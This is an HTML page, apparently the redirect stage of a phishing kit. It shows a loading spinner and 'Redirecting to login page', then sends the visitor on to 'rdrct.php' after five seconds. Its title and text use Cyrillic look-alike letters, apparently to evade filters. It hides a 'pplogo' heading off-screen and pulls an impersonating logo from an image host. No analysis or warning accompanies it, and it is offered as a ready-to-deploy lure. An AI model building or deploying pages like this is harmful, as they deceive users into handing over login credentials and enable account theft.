<html>

<head>
    <meta charset="UTF-8">
    <title>Rеdirесting Tо Lоgin Pаgе</title>
    <link rel="shortout icon" href="favicon.ico"/>
    
    
    
    </head>
    <style>
        
        .logo{
            
            text-indent: -99999999px;
            
            width: 128px;
            height: 32px;
            
        }
        .loader{
             position: absolute;
    left: 45%;
    top: 40%;
            border:16px solid #f3f3f3;
            border-radius: 50%;
            border-top: 16px solid #3498cb;
            width: 100px;
            height: 100px;
            animation: spin 2s linear infinite;
            
        }
        @keyframes spin {
            0% { transform: rotate(0deg);}
            100% {transform: rotate(360deg);}
        }
    .myclass {
    position:absolute;
    left: 44%;
    top:65%;
}
    </style>
    
<body>
    <p style="text-align:center;"><img src="https://i.imgur.com/UJqCunw.png">
    <h1 class="logo">pplogo</h1>
    <div class="loader"></div>
        <div class="myclass">Rеdirесting tо lоgin page...</div>


    
    </body>
   <meta http-equiv="refresh" content="5;rdrct.php">
</html>